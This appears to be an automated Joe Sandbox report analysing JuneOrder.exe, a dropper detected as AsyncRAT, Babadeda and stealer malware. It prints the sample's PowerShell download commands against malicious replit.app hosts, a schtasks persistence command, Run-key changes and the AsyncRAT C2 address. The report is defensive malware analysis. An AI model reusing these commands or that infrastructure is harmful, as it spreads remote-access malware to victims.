Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JuneOrder.exe

Overview

General Information

Sample name:JuneOrder.exe
Analysis ID:1484561
MD5:2b19d65705eee546214513fb65948b2a
SHA1:20b6c01b9f20047fc9f3bf9baa14b5046cbc0012
SHA256:106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f
Tags:Babadedaexe
Infos:

Detection

AsyncRAT, Babadeda, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected Babadeda
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • JuneOrder.exe (PID: 5160 cmdline: "C:\Users\user\Desktop\JuneOrder.exe" MD5: 2B19D65705EEE546214513FB65948B2A)
    • cmd.exe (PID: 6792 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1608 cmdline: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6764 cmdline: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • CoinAIfdp.exe (PID: 3796 cmdline: CoinAIfdp.exe MD5: 1B3E4783A56A59A811CBD437C6C34A18)
        • cmd.exe (PID: 2088 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 3676 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 6756 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE1C4.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3964 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • svchst.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\svchst.exe" MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • svchst.exe (PID: 4920 cmdline: C:\Users\user\AppData\Roaming\svchst.exe MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • CoinAIfdp.exe (PID: 2396 cmdline: "C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe" MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • svchst.exe (PID: 1608 cmdline: "C:\Users\user\AppData\Roaming\svchst.exe" MD5: 1B3E4783A56A59A811CBD437C6C34A18)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"External_config_on_Pastebin": "null", "Server": "192.228.105.2", "Ports": "7707", "Version": "0.5.7B", "Autorun": "true", "Install_Folder": "svchst.exe", "Install_File": "R0hSMDE2RzNaWE5hTEk3Qm50RjAzUzZUTGxSZmpKUGc="}
SourceRuleDescriptionAuthorStrings
JuneOrder.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xda01a:$x1: AsyncRAT
    • 0xda058:$x1: AsyncRAT
    sslproxydump.pcapWindows_Trojan_Asyncrat_11a11ba1unknownunknown
    • 0xaba2a:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
    • 0xace87:$a2: Stub.exe
    • 0xacf17:$a2: Stub.exe
    • 0xa8426:$a3: get_ActivatePong
    • 0xabc42:$a4: vmware
    • 0xababa:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
    • 0xa92d3:$a6: get_SslClient
    sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0xadd9c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0xb1660:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    sslproxydump.pcapINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0xababc:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\windowscachergslog.binJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\Users\user\AppData\Roaming\windowscachergslog.binWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0xabc6:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0xbec5:$a2: Stub.exe
      • 0xbf55:$a2: Stub.exe
      • 0x7996:$a3: get_ActivatePong
      • 0xadde:$a4: vmware
      • 0xac56:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x86e5:$a6: get_SslClient
      C:\Users\user\AppData\Roaming\windowscachergslog.binWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0xcd08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x1023e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      C:\Users\user\AppData\Roaming\windowscachergslog.binINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0xac58:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458JoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.2725016473.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xbdfb:$x1: AsyncRAT
        • 0xbe39:$x1: AsyncRAT
        00000006.00000002.1629482910.0000000003DB6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000006.00000000.1560929990.00000000009A2000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000010.00000002.1721681170.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x9933:$x1: AsyncRAT
            • 0x9971:$x1: AsyncRAT
            00000011.00000002.1800707504.00000000028C6000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x833:$x1: AsyncRAT
            • 0x871:$x1: AsyncRAT
            Click to see the 43 entries
            SourceRuleDescriptionAuthorStrings
            6.2.CoinAIfdp.exe.55b128d.2.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              6.2.CoinAIfdp.exe.55b128d.2.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
              • 0x7b39:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
              • 0x8e38:$a2: Stub.exe
              • 0x8ec8:$a2: Stub.exe
              • 0x4909:$a3: get_ActivatePong
              • 0x7d51:$a4: vmware
              • 0x7bc9:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
              • 0x5658:$a6: get_SslClient
              6.2.CoinAIfdp.exe.55b128d.2.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
              • 0x9c7b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
              6.2.CoinAIfdp.exe.55b128d.2.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
              • 0x7bcb:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
              13.2.svchst.exe.2c66795.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Click to see the 47 entries

                System Summary

                barindex
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: CoinAIfdp.exe, ParentImage: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ParentProcessId: 3796, ParentProcessName: CoinAIfdp.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, ProcessId: 2088, ProcessName: cmd.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: CoinAIfdp.exe, ParentImage: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ParentProcessId: 3796, ParentProcessName: CoinAIfdp.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, ProcessId: 2088, ProcessName: cmd.exe
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ProcessId: 3796, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, ProcessId: 3796, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", ProcessId: 1608, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2088, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' , ProcessId: 3676, ProcessName: schtasks.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", ProcessId: 1608, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6792, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg", ProcessId: 1608, ProcessName: powershell.exe
                No Snort rule has matched
                Timestamp:2024-07-30T11:11:44.820859+0200
                SID:2035607
                Source Port:7707
                Destination Port:49717
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-07-30T11:12:19.488269+0200
                SID:2022930
                Source Port:443
                Destination Port:49718
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-30T11:11:41.311766+0200
                SID:2022930
                Source Port:443
                Destination Port:49710
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpgAvira URL Cloud: Label: phishing
                Source: https://secured-order-download-businessportal.replit.app/CoinAIfdp.exeAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeAvira: detection malicious, Label: HEUR/AGEN.1353849
                Source: C:\Users\user\AppData\Roaming\svchst.exeAvira: detection malicious, Label: HEUR/AGEN.1353849
                Source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "192.228.105.2", "Ports": "7707", "Version": "0.5.7B", "Autorun": "true", "Install_Folder": "svchst.exe", "Install_File": "R0hSMDE2RzNaWE5hTEk3Qm50RjAzUzZUTGxSZmpKUGc="}
                Source: jdvdpconstructionltdfileportal.replit.appVirustotal: Detection: 12%Perma Link
                Source: https://secured-order-download-businessportal.replit.app/CoinAIfdp.exeVirustotal: Detection: 5%Perma Link
                Source: https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpgVirustotal: Detection: 5%Perma Link
                Source: https://oshi.at/qNzy/OfCN.binVirustotal: Detection: 5%Perma Link
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeVirustotal: Detection: 58%Perma Link
                Source: C:\Users\user\AppData\Roaming\svchst.exeReversingLabs: Detection: 70%
                Source: C:\Users\user\AppData\Roaming\svchst.exeVirustotal: Detection: 58%Perma Link
                Source: JuneOrder.exeVirustotal: Detection: 43%Perma Link
                Source: JuneOrder.exeReversingLabs: Detection: 55%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\svchst.exeJoe Sandbox ML: detected
                Source: JuneOrder.exeJoe Sandbox ML: detected

                Compliance

                barindex
                Source: C:\Users\user\Desktop\JuneOrder.exeUnpacked PE file: 0.2.JuneOrder.exe.400000.0.unpack
                Source: JuneOrder.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: Binary string: CoinAI.pdb source: CoinAIfdp.exe, 00000006.00000002.1629482910.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000000.1560929990.00000000009A2000.00000002.00000001.01000000.00000005.sdmp, CoinAIfdp.exe.5.dr, svchst.exe.6.dr
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.tmpJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Temp\BC2F.tmpJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmpJump to behavior

                Networking

                barindex
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /qNzy/OfCN.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 34.117.33.233 34.117.33.233
                Source: Joe Sandbox ViewIP Address: 5.253.86.15 5.253.86.15
                Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
                Source: Joe Sandbox ViewASN Name: FIBERHUBUS FIBERHUBUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /purchaseOrder.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jdvdpconstructionltdfileportal.replit.appConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /CoinAIfdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: secured-order-download-businessportal.replit.appConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: unknownTCP traffic detected without corresponding DNS query: 192.228.105.2
                Source: global trafficHTTP traffic detected: GET /purchaseOrder.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jdvdpconstructionltdfileportal.replit.appConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /CoinAIfdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: secured-order-download-businessportal.replit.appConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /qNzy/OfCN.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: jdvdpconstructionltdfileportal.replit.app
                Source: global trafficDNS traffic detected: DNS query: secured-order-download-businessportal.replit.app
                Source: global trafficDNS traffic detected: DNS query: oshi.at
                Source: svchst.exe, 0000000F.00000002.2725016473.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabWe
                Source: svchst.exe, 0000000F.00000002.2725016473.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enk
                Source: CoinAIfdp.exeString found in binary or memory: http://schemas.microsof
